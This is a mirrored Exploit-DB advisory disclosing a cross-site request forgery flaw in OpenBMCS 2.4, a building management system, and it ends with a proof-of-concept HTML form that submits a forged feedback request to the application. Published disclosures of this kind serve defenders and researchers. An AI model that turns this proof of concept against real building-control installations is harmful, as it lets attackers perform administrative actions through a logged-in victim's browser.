bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50667.txt
Offensive Security eb2b6f5cfd DB: 2022-01-19 
12 changes to exploits/shellcodes

WorkTime 10.20 Build 4967 - Unquoted Service Path

Archeevo 5.0 - Local File Inclusion
Online Resort Management System 1.0 - SQLi (Authenticated)
OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)
OpenBMCS 2.4 - SQLi (Authenticated)
OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation
OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated)
OpenBMCS 2.4 - Information Disclosure
Simple Chatbot Application 1.0 - Remote Code Execution (RCE)
Simple Chatbot Application 1.0 - 'message' Blind SQLi
Nyron 1.0 - SQLi (Unauthenticated)
Creston Web Interface 1.0.0.2159 - Credential Disclosure
2022-01-19 05:01:58 +00:00

54 lines
No EOL
1.6 KiB
Text
Raw Blame History

# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 CSRF Send E-mail
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5691
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php
26.10.2021
--
<html>
<body>
<form action="https://192.168.1.222/core/sendFeedback.php" method="POST">
<input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
<input type="hidden" name="message" value="Take me to your leader." />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="submit" value="Send" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink